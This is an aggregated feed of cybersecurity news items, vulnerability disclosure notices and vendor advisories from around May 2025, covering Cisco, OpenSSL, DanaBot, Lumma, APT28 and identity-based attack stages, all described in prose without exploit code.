A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Do Manh Dung & Nguyen Dang Nguyen of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Thomas Bouzerar (@MajorTomSec) from @Synacktiv, Etienne Helluy-Lafont from @Synacktiv' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 6.0 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N severity vulnerability discovered by 'Viettel Cyber Security' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Chen Le Qi of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Chen Le Qi of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 6.0 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N severity vulnerability discovered by 'Viettel Cyber Security' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Hyeonjin Choi (@d4m0n_8) of Out Of Bounds' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Hossein Lotfi (@hosselot) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A vulnerability was identified in OpenSSL. A remote attacker could exploit this vulnerability to trigger security restriction bypass. Impact Security Restriction Bypass System / Technologies affected OpenSSL version 3.5 Solutions Before installation of the software, please visit the software manufacturer web-site for more details.   For version 3.5, upgrade to version 3.5.1

A vulnerability was identified in ModSecurity. A remote attacker could exploit this vulnerability to trigger denial of service condition on the targeted system. Impact Denial of Service System / Technologies affected ModSecurity version 2.9.8 Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-859r-vvv8-rm8r

Multiple vulnerabilities were identified in Cisco products. A remote attacker could exploit some of these vulnerabilities to trigger cross-site scripting and data manipulation on the targeted system. Impact Data Manipulation Cross-Site Scripting System / Technologies affected Cisco Webex Cisco Webex Meetings Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-cache-Q4xbkQBG https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-xss-7teQtFn8

Real-time threat intelligence refers to the continuous process of collecting, analyzing, and disseminating data about active or emerging cyberthreats.

Learn about CVE-2025-3248 affecting Langflow. Patch now to prevent remote code execution.

De multiples vulnérabilités ont été découvertes dans Tenable Nessus Network Monitor. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.

De multiples vulnérabilités ont été découvertes dans Asterisk. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité.

De multiples vulnérabilités ont été découvertes dans Grafana. Elles permettent à un attaquant de provoquer une atteinte à l'intégrité des données et une injection de code indirecte à distance (XSS).

De multiples vulnérabilités ont été découvertes dans Mozilla Thunderbird. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

Une vulnérabilité a été découverte dans Microsoft Edge. Elle permet à un attaquant de provoquer une élévation de privilèges.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une atteinte à l'intégrité des données et un contournement de la politique de sécurité.

Entre le 19 et le 23 mai 2025, de nouvelles actions de démantèlement ont été menées contre plusieurs infrastructures liées à des codes cybercriminels. Ces actions ont été réalisées dans le cadre de l’opération de coopération judiciaire internationale ENDGAME lancée en...

Estão abertas as inscrições na plataforma de treino do Cybersecurity Challenge PT. Esta é uma iniciativa destinada a jovens estudantes entre os 16 e os 25 anos e que tem como objetivo selecionar 10 jovens talentos em Cibersegurança, que vão representar Portugal no European Cybersecurity Challenge que decorre, na Polónia. Ao longo das próximas semanas vão sendo lançados, na plataforma de treino, desafios de vários níveis de dificuldade que fazem parte da qualificação para esta competição. A prova de pré-qualificação da Team Portugal, com uma competição de Capture the Flag (CTF), terá lugar no dia 7 de junho, das 9h00 às 19h00. O Cybersecurity Challenge PT resulta de uma cooperação entre o Centro Nacional de Cibersegurança (CNCS), o Instituto Superior Técnico, a Universidade do Porto e a AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação. Esta iniciativa é apoiada pelo Centro Internet Segura (CIS). Inserido no eixo Educação do programa INCoDe.2030 e no plano de ação da Estratégia Nacional de Segurança do Ciberespaço, o Cybersecurity Challenge PT, conta, todos os anos, com centenas de participantes. Esta atividade promove competências nas várias áreas da segurança informática, permitindo o desenvolvimento de processos de colaboração e trabalho em equipa e um crescimento individual dos participantes através da resolução de desafios complexos. Saber mais em https://cybersecuritychallenge.pt/

An exploration of techniques used by the obfuscator ALCATRAZ.

With the release of MetaDefender Sandbox 2.3.0, OPSWAT delivers key advancements in AI-driven malware analysis, reverse engineering workflows, and behavior-based threat detection to meet these demands head-on.

The U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.

Flashpoint is proud to have supported this investigation as part of an alliance of government agencies and private sector partners. The post Operation Endgame: Global Law Enforcement Takes Down DanaBot Malware Scheme appeared first on Flashpoint.

Amber Albatross continues its reign and Latrodectus crawls into the top 10 in this month's edition of Intelligence Insights

ESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation

A new US indictment against a group of Russian nationals offers a clear example of how, authorities say, a single malware operation can enable both criminal and state-sponsored hacking.

In the world of cybersecurity, passionate debates often emerge about the "right" approach to microsegment critical systems. For years, vendors have staked claims on either agent-based or agentless segmentation, advocating their chosen method as the superior solution. But what if the reality - especially for complex environments like electric utilities - requires a more nuanced perspective?

Payloads were set to spontaneously detonate on specific dates with no warning.

AI is transforming cybersecurity. Explore how hackers use AI for cybercrimes and how cybersecurity experts use AI to prevent, detect, and respond to attacks.

Unlike accidental data leaks caused by human error or misconfigured systems, data exfiltration is a deliberate and malicious act. It involves the unauthorized transfer of sensitive data from within a secured environment to an external destination controlled by threat actors. This form of cybercrime is not only growing in sophistication but also in frequency, driven by motivations ranging from financial gain to geopolitical agendas.  What Is... Read more » The post Data Exfiltration Explained: Techniques, Risks, and Defenses appeared first on Plixer.

Täna, 22. mail kell 20.00, lõppes mobiiltelefonidele loodud e-hääletamise rakenduse prototüübi avalik testimine. Testimise eesmärk oli koguda kasutajatelt tagasisidet rakenduse töökindluse, kasutusmugavuse ning häälte kogumisteenuse toimimise kohta.

Hazel observes that cybercriminals often fumble teamwork, with fragile alliances crumbling over missed messages. Plus, how UAT-6382 is exploiting Cityworks and what you can do to stay secure.

"Broadcom is unlikely to make any voluntary changes to its new commercial terms."

Anthropic says Claude 4 beats Gemini on coding benchmarks; works autonomously for hours.

In an era where cyberattacks are becoming more frequent, sophisticated, and damaging, organizations in the UK and around the world are under increasing pressure to adopt effective cybersecurity measures. Threats such as phishing, ransomware, data breaches, and supply chain compromises now target businesses of every size, often resulting in significant financial losses, legal implications, and […]

Authorities, along with tech companies including Microsoft and Cloudflare, say they’ve disrupted Lumma.

Joint Cybersecurity Advisory (CSA) AA25-141A exposes a sustained and multifaceted cyber-espionage campaign attributed to Russia’s GRU Unit 26165, also known as APT28, Fancy Bear, Forest Blizzard, and a host of other monikers. Since early 2022, this group has relentlessly targeted Western logistics and technology companies involved in supporting Ukraine, exploiting both legacy and zero-day vulnerabilities [...] The post Frontline Intel: Pinpointing GRU’s TTPs in the Recent Campaign appeared first on Logpoint.

Joint Cybersecurity Advisory (CSA) AA25-141A exposes a sustained and multifaceted cyber-espionage campaign attributed to Russia’s GRU Unit 26165, also known as APT28, Fancy Bear, Forest Blizzard, and a host of other monikers. Since early 2022, this group has relentlessly targeted Western logistics and technology companies involved in supporting Ukraine, exploiting both legacy and zero-day vulnerabilities [...] The post Frontline Intel: Pinpointing GRU’s TTPs in the Recent Campaign appeared first on Logpoint.

Organisations urged to familiarise themselves with the threat and take immediate action to protect themselves.

Cloud and AI technologies are delivering measurable results for global businesses.

Cisco announced the signing of a Memorandum of Understanding (MoU) to join the Stargate UAE consortium as a preferred technology partner. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco announced the signing of a Memorandum of Understanding (MoU) to join the Stargate UAE consortium as a preferred technology partner. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

The bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies

GlobalData, a research and analysis firm, released its 2025 Competitive Landscape Assessment report on Managed Infrastructure Services for Telcos. The report named Huawei as a Leader for its product solutions and global service capabilities.

As cyberattacks surge and premiums skyrocket, cyber insurance has shifted from a nice-to-have to a business-critical safeguard. But having a policy isn’t enough – to qualify for coverage, reduce costs, and ensure claims are paid, organizations must meet a growing list of cybersecurity requirements. The global cybersecurity insurance market is expected to reach $13.6B in 2025, with more than 80% of organizations already covered and 1 in 5 increasing their policy limits in the last…

As part of a recent survey conducted by Mobile World Live, communications service providers (CSPs) were asked to weigh in on the state of artificial intelligence (AI) innovation and the challenges they face when deploying AI for IT operations (AIOps) in the network. Their responses, published in a 34-page report, offer...

Traditional firewalls can’t keep up with today’s rapidly evolving security threats. Versa Networks’ Next-Generation Firewall (NGFW) leverages its deep expertise and leadership in network security to protect today’s dynamic digital environments. The post Next-Gen Firewall Redefined: Versa NGFW Takes the Lead first appeared on The Versa Networks Blog.

When we first asked, “Will the cloud kill the agent?”, the security world was buzzing about agentless solutions. Three years... The post Cloud hasn’t killed the agent: A real-time reality check appeared first on Sysdig.

When we first asked, “Will the cloud kill the agent?”, the security world was buzzing about agentless solutions. Three years... The post Cloud hasn’t killed the agent: A real-time reality check appeared first on Sysdig.

This datasheet outlines how Silent Push provides preemptive cyber threat intelligence through our proprietary Indicators of Future Attack™ (IOFA™), enabling organizations to detect and stop malicious infrastructure before attacks occur. By leveraging IOFA™, TTP-led analysis, and real-time data enrichment, Silent Push empowers proactive threat hunting, brand protection, and early threat detection. Ready to dive deeper […] The post Preemptive Cyber Intelligence with Indicators of Future Attack™ appeared first on Silent Push.

Cisco publicerar säkerhetsuppdateringar för Cisco Identity Services Engine (ISE) och Cisco Unified Intelligence Center (UIC). Sårbarheterna har benämning CVE-2025-20152 och CVE-2025-20113, med en CVSS-klassning på 8.6 respektive 7.1. [1, 2].

Preventing illicit trafficking is a daunting task for border security agencies. AI-powered Computer Vision and location intelligence enhance security, reduce costs, and close surveillance gaps. The post Revolutionizing Border Security with Cellular Positioning appeared first on SS8.

Learn about the latest ClickFix tactics compromising websites and embedding fraudulent CAPTCHA images to deliver malware and malicious code.

While credential abuse is a primary initial access vector, identity compromise plays a key role in most stages of a cyber attack. Here’s what you need to know — and how Tenable can help.Identity compromise plays a pivotal role in how attackers move laterally through an organization. Credential abuse is the top initial access vector, implicated in 22% of breaches, according to the 2025 Verizon Data Breach Investigations Report, followed closely by vulnerability exploitation (20%). But identity compromise doesn’t stop after initial access. It plays a key role in five stages of a cyber attack.Understanding the following stages of an attack helps illuminate where identity becomes a threat vector:Initial accessReconnaissanceLateral movement and privilege escalationPersistence and detection evasionDeploymentBelow, we explore actions security teams can take to protect identities in each of these stages. While the guidance we share here is based on protecting on-premises Microsoft Active Directory environments, it’s worth considering how credential compromise can affect Microsoft Entra ID and hybrid identity infrastructure. We also discuss how Tenable Identity Exposure, available in the Tenable One Exposure Management Platform, can be used at each stage to provide security teams with valuable insights to help them proactively reduce their exposure to cyber attacks.Stage 1: Initial accessAttackers need a foothold and credential abuse enables them to get one. To prevent credentials from being abused by attackers, organizations need to proactively make sure their users have a strong password accompanied with two-factor (2FA) or multi-factor authentication (MFA). This is done by enforcing policies for password complexity, length, reuse and change frequency to which an organization’s users have to adhere. Even so, having full visibility into identities can be challenging for the security teams tasked with enforcing these policies.Tenable Identity Exposure provides the following indicators that security teams can use to gain visibility into areas where weaknesses may exist.Password Policy WeaknessCleartext Passwords in UseDetection of Password WeaknessesStage 2: ReconnaissanceOnce attackers have access to an environment they need to understand what it looks like and how they can exploit configurations and/or vulnerabilities to move onto the next step of lateral movement and privilege escalation. There are a number of legitimate security tools available that attackers can use to gain visibility into the environment. When these are used against an environment maliciously, they give away key secrets that can then be leveraged for movement across the environment.Tenable Identity Exposure provides indicators of attack to give security teams visibility into behavior that looks like these security tools are being run in your environment, which could be malicious if not expected. These indicators include:Massive Computer EnumerationAdministrative Account ScanningStage 3: Lateral movement and privilege escalationOnce they’ve completed their reconnaissance, attackers will try to use their findings to move between your environment objects to gain access to the privileged assets required to further their attack. How do they do this? Exploitation of relationships. To do so, they may try to access a system that is caching privileged user credentials, or they may try to reset the password on another identity in the environment. To protect against such activity you need to enforce policies restricting who is allowed to log onto certain system types, prevent password caching where possible and remove unnecessary relationships between objects. Tenable Identity Exposure provides indicators that can help security teams manage restrictions and spot inconsistencies, including:Administrative Logon RestrictionsDomain Controller Access InconsistenciesTenable is also able to provide graphical representations of relationships between identity objects in the attack paths.Stage 4: Persistence and evasionAnother key goal of lateral movement is for attackers to get themselves in a position where they can gain persistent access to the environment and avoid being detected. Given the complexity and requirements of identity solutions like Active Directory there are a number of backdooring techniques that can be utilized. One of the lesser-known of these is the exploitation of the AdminSDHolder container. Once an identity is added to this container, which is hidden by default in Active Directory, it will then periodically be granted access to highly privileged groups such as domain administrators. This access is granted through the SDProp process that, by default, is scheduled to run every 60 minutes. So even when the access is removed directly from the privileged groups, it is re-granted one hour later through the SDProp process when AdminSDHolder access is granted. Tenable Identity Exposure has the following indicator providing continuous visibility into AdminSDHolder membership:Ensure SDProp ConsistencyThere are a number of security tools on the market that can run point-in-time assessments to show weaknesses that need to be addressed; this data is often provided in a single report with no filterable history. Given the dynamic nature of identities, point-in-time assessments leave gaps in visibility for security teams. Attackers can take advantage of these gaps by making the changes in the environment to facilitate their activities and then undoing them before the next point-in-time assessment is performed, leaving security teams none the wiser. To be most effective, identity configuration monitoring should be continuous and have a filterable and referenceable record of all changes.Tenable Identity Exposure continually monitors Active Directory and the indicator below provides a trail flow for this very purpose:Trail FlowStage 5: DeploymentFinally, we have the deployment of the payload, such as malicious code, malware or ransomware. Chances are an attacker will need to run some sort of script or installer — such as PowerShell scripts — to achieve this. Putting a restriction in place through security policies to prevent these running can dramatically reduce risk.Tenable Identity Exposure provides the following indicator, specifically related to ransomware, to help security teams gain visibility into those places in the environment where the ability to run PowerShell scripts and access AppLocker could be restricted:.Insufficient Hardening Against RansomwareThe bigger pictureIn summary, we can see how identity is at the heart of each of these five stages of a cyber attack. While the above examples are focused around on-prem Active Directory, hybrid environments are also a target for attackers, such as the 2024 attack by Storm-0501. Tenable Identity Exposure, available in the Tenable One Exposure Management Platform, provides visibility into both Active Directory and Entra ID. Tenable Cloud Security also provides a comprehensive view into identity entitlement within public cloud providers and identity providers (IdPs), such as Ping Identity and Okta.Identity security is fundamental to a proactive exposure management program. To achieve effective exposure management, organizations need a comprehensive view of their entire attack surface. This means pulling together all available data from across their security tools, including those for identity, applications, cloud, operational technology (OT), endpoint, asset inventories, configuration management data bases (CMDBs), threat intelligence feeds and more. By combining insights from these diverse data sources, security teams can see the bigger picture, connecting the dots between assets, vulnerabilities, misconfigurations and existing compensating controls across multiple environments. The Tenable One Exposure Management Platform gives you a single, prioritized view of risk. By breaking down data silos and integrating insights from multiple security tools, organizations can reduce the likelihood of a breach and minimize risk exposure across the attack surface. Instead of viewing risks in isolation, security teams can connect the dots — understanding how attackers see their environment and taking smarter, more proactive action to reduce exposure.Learn more2024 Gartner® Prioritize IAM Hygiene for Robust Identity-First Security ReportFrom Managing Vulnerabilities to Managing Exposure: The Critical Shift You Can’t IgnoreA Unified Approach to Exposure Management: Introducing Tenable One Connectors and Customized Risk Dashboards

Many organizations prioritize detection, analysis, and containment — but what comes after is where true resilience is built.Once a threat […]

SAP BTP connects, extends, and automates business processes and applications, accelerates application development, and deploys AI capabilities that drive growth and innovation.

New innovations represent a fundamental shift in how businesses can approach their operations in an increasingly complex global landscape.

One of the biggest cyber scandals of the year directly involves the U.S. government. In early May, investigative media outlet 404 Media revealed that certain U.S. federal agencies, including U.S. Customs and Border Protection, were using a cloned and modified version of the Signal app.

Brett's combination of strategic insight and decades of global experience will help deepen our longstanding partnerships in the Middle East and globally.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco (NASDAQ: CSCO) today announced that it will participate in the Bank of America Global Technology ConferenceMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco (NASDAQ: CSCO) today announced that it will participate in the Bank of America Global Technology ConferenceMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

AI Data Security

The NCSC and DSIT work with ETSI to ‘set a benchmark for securing AI’.

Addressing common issues such as misconfiguration and weak encryption can turn workers into victims

The Hidden Risk in Security Policies  Policy misconfigurations remain one of the most common and costly risks in network security. Studies in recent years have shown that the vast majority of firewall breaches stem from policy configuration errors, and human mistakes or skill gaps continue to be a leading cause of major security incidents. Traditionally,... The post Cato Networks Demonstrates AI-Based Policy Analysis and Enforcement at AWS Summit Tel Aviv 2025  appeared first on Cato Networks.

Discover why shifting from cyberattack prevention to cyber resilience is the key to survival in today?s relentless cyberthreat landscape.

In today's evolving threat landscape, we continually see new threat actors emerge and novel attack techniques surface. To keep pace, defenders must monitor the tactics, techniques, and procedures (TTPs) leveraged by these threat actors. A critical part of this understanding comes from analyzing the tools attackers use to achieve their objectives. Among the most widely [...] The post The Impacket Arsenal: A Deep Dive into Impacket Remote Code Execution Tools appeared first on Logpoint.

In today's evolving threat landscape, we continually see new threat actors emerge and novel attack techniques surface. To keep pace, defenders must monitor the tactics, techniques, and procedures (TTPs) leveraged by these threat actors. A critical part of this understanding comes from analyzing the tools attackers use to achieve their objectives. Among the most widely [...] The post The Impacket Arsenal: A Deep Dive into Impacket Remote Code Execution Tools appeared first on Logpoint.

Talos has observed exploitation of CVE-2025-0994 in the wild by UAT-6382, a Chinese-speaking threat actor, who then deployed malware payloads via TetraLoader.

This blog post analyzes the Vicious Trap, a honeypot network deployed on compromised edge devices. La publication suivante ViciousTrap – Infiltrate, Control, Lure: Turning edge devices into honeypots en masse.  est un article de Sekoia.io Blog.

Let your commits build faster with webhooks When you commit changes, you want your build to start as soon as you push code. Waiting for several minutes for a polling interval can be frustrating. That’s why we’re introducing webhooks, a simple way for your version control system to notify TeamCity as soon as new code […]

Crypto fraud meets cuddly toys! US authorities have charged a group accused of stealing $263 million in cryptocurrency - and then laundering the cash by stuffing it into Squishmallows. Read more in my article on the Hot for Security blog.

Improper link resolution before file access ('link following') in Microsoft Edge (Chromium-based) allows an authorized attacker to elevate privileges locally.

A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an authenticated, local attacker to elevate privileges to root on an affected device. This vulnerability is due to excessive permissions that have been assigned to system commands. An attacker could exploit this vulnerability by executing crafted commands on the underlying operating system. A successful exploit could allow the attacker to escape the restricted shell and gain root privileges on the underlying operating system of an affected device. To successfully exploit this vulnerability, an attacker would need administrative access to the ESXi hypervisor. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-kkhZbHR5 Security Impact Rating: Medium CVE: CVE-2025-20112

Multiple vulnerabilities in Cisco Unified Intelligence Center could allow an authenticated, remote attacker to perform privilege escalation attacks on an affected system. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-priv-esc-3Pk96SU4 Security Impact Rating: High CVE: CVE-2025-20113,CVE-2025-20114

A vulnerability in the self-service portal of Cisco Duo could allow an unauthenticated, remote attacker to inject arbitrary commands into emails that are sent by the service. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by injecting arbitrary commands into a portion of an email that is sent by the service. A successful exploit could allow the attacker to send emails that contain malicious content to unsuspecting users. Cisco Duo has addressed this vulnerability in the service, and no customer action is necessary to update on-premises software or devices. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-duo-ssp-cmd-inj-RCmYrNA Security Impact Rating: Medium CVE: CVE-2025-20258

A vulnerability in the RADIUS message processing feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper handling of certain RADIUS requests. An attacker could exploit this vulnerability by sending a specific authentication request to a network access device (NAD) that uses Cisco ISE for authentication, authorization, and accounting (AAA). A successful exploit could allow the attacker to cause Cisco ISE to reload. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-restart-ss-uf986G2Q Security Impact Rating: High CVE: CVE-2025-20152

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have valid administrative credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-stored-xss-Yff54m73 Security Impact Rating: Medium CVE: CVE-2025-20267

A vulnerability in an API subsystem of Cisco Secure Network Analytics Manager and Cisco Secure Network Analytics Virtual Manager could allow an authenticated, remote attacker with low privileges to generate fraudulent findings that are used to generate alarms and alerts on an affected product. Thi vulnerability is due to insufficient authorization enforcement on a specific API. An attacker could exploit this vulnerability by authenticating as a low-privileged user and performing API calls with crafted input. A successful exploit could allow the attacker to obfuscate legitimate findings in analytics reports or create false indications with alarms and alerts on an affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-apiacv-4B6X5ysw Security Impact Rating: Medium CVE: CVE-2025-20257

A vulnerability in the web-based management interface of Cisco Secure Network Analytics Manager and Cisco Secure Network Analytics Virtual Manager could allow an authenticated, remote attacker with valid administrative credentials to execute arbitrary commands as root on the underlying operating system. This vulnerability is due to insufficient input validation in specific fields of the web-based management interface. An attacker with valid administrative credentials could exploit this vulnerability by sending crafted input to an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.  Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-ssti-dPuLqSmZ Security Impact Rating: Medium CVE: CVE-2025-20256

A vulnerability in client join services of Cisco Webex Meetings could allow an unauthenticated, remote attacker to manipulate cached HTTP responses within the meeting join service. This vulnerability is due to improper handling of malicious HTTP requests to the affected service. An attacker could exploit this vulnerability by manipulating stored HTTP responses within the service, also known as HTTP cache poisoning. A successful exploit could allow the attacker to cause the Webex Meetings service to return incorrect HTTP responses to clients. Cisco has addressed this vulnerability in the service, and no customer action is necessary to update on-premises software or devices. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-cache-Q4xbkQBG Security Impact Rating: Medium CVE: CVE-2025-20255

Multiple vulnerabilities in Cisco Webex could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack. These vulnerabilities are due to improper filtering of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user to follow a malicious link. A successful exploit could allow the attacker to conduct a cross-site scripting attack against the targeted user. Cisco has addressed these vulnerabilities in the service, and no customer action is necessary to update on-premises software or devices. There are no workarounds that address the vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-xss-7teQtFn8 Security Impact Rating: Medium CVE: CVE-2025-20246,CVE-2025-20247,CVE-2025-20250

A vulnerability in the Cloud Connect component of Cisco Unified Contact Center Enterprise (CCE) could allow an unauthenticated, remote attacker to read and modify data on an affected device. This vulnerability is due to a lack of proper authentication controls. An attacker could exploit this vulnerability by sending crafted TCP data to a specific port on an affected device. A successful exploit could allow the attacker to read or modify data on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-contcent-insuffacces-ArDOVhN8 Security Impact Rating: Medium CVE: CVE-2025-20242